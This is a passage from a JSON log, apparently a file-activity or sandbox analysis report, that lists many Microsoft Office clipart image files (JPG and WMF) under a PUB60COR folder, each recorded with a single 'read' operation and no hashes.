"type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145895.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145904.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152606.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153273.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153305.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153398.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158477.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0164153.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186362.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188669.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195320.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195320.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195342.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195342.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195428.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195428.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197979.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197979.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0197983.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0197983.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198016.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198016.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198020.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198021.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198022.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198102.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198102.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198113.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198113.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198226.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198226.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198234.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198234.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198372.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198372.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198377.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198377.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198447.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198494.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198712.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199279.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199303.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199303.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199307.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199307.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199423.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199423.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199429.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199429.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200273.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200273.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200279.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200289.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200289.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200377.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200377.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0200383.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0200383.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0202045.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0211981.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0211981.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214934.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214948.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215210.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215210.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215710.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0215710.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216112.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216153.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216540.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216540.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216570.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216570.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216874.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227419.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227558.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228823.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228959.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228959.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232393.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232393.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232395.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232395.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232797.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232797.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0232803.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0232803.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0233992.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0233992.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234000.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234000.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0234001.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0234001.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program 